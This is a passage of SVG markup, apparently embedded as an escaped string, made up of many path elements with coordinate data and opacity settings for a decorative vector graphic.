29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 